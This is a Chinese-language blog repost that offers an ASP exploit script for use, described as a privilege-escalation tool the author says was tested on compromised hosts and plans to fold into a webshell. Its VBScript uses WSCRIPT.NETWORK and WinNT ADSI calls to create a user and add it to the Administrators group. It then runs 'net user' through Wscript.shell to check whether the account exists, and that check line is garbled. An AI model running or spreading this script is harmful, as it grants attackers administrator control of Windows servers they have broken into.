添加超級用戶的.asp代碼

穩萊

添加超級用戶的.asp代碼
 
其實上個禮拜我和凱文就在我的肉雞上測試了,還有河馬史詩.結果是在user權限下成功添加Administrators組的用戶了(雖然我不敢相信我的眼睛).
上次凱文不發話,我不敢發佈啊....現在在他的blog 上看到他發佈了,就轉來了咯(比我上次測試時還改進了一點,加了個表單).這下大家有福咯```

反正代碼是對的,但是很少能成功,具體的看運氣了。。呵呵,下一步我想把他整合到海洋裡面去。嘿嘿。


程式代碼:

<head>.network對像腳本權限提升漏洞利用工具</head>
<form action="useradd.asp" method=post>
用戶:<input name="username" type="text" value="kevin1986"><br>
密碼:<input name="passwd" type="password"><br>
     <input type="submit" Value="添 加">
</form>

 

<%
@codepage=950
on error resume next
if request.servervariables("REMOTE_ADDR")<>"127.0.0.1" then
    response.write "iP !s n0T RiGHt"
else
    if request("username")<>"" then
        username=request("username")
        passwd=request("passwd")
        Response.Expires=0
        Session.TimeOut=50
        Server.ScriptTimeout=3000
        set lp=Server.CreateObject("WSCRIPT.NETWORK")
        oz="WinNT://"&lp.ComputerName
        Set ob=GetObject(oz)
        Set oe=GetObject(oz&"/Administrators,group")
        Set od=ob.Create("user",username)
        od.SetPassword passwd
        od.SetInfo
        oe.Add oz&"/"&username
        if err then
            response.write "哎~~今天你還是別買6+1了……省下2元錢買瓶可樂也好……"
        else
            if instr(server.createobject("Wscript.shell").exec("cmd.exe /c net user "&username.stdout.readall),"上次登錄")>0 then
                response.write "雖然沒有錯誤,但是好像也沒建立成功.你一定很鬱悶吧"
            else
                Response.write "OMG!"&username&"帳號居然成了!這可是未知漏洞啊.5,000,000RMB是你的了"
            end if
        end if
    else
        response.write "請輸入輸入用戶名"
    end if
    end if
%>

 
 

 給當前日誌評分:
Loading Vote
正在讀取評分資料...


文章來自: Tank部落格
引用通告: 查看所有引用 | 我要引用此文章
Tags:
相關日誌:

評論: 0 | 引用: 0 | 查看次數: -
發表評論
暱 稱:
密 碼: 遊客發言不需要密碼.
內 容:
驗證碼: 驗證碼
選 項:
雖然發表評論不用註冊,但是為了保護您的發言權,建議您註冊帳號.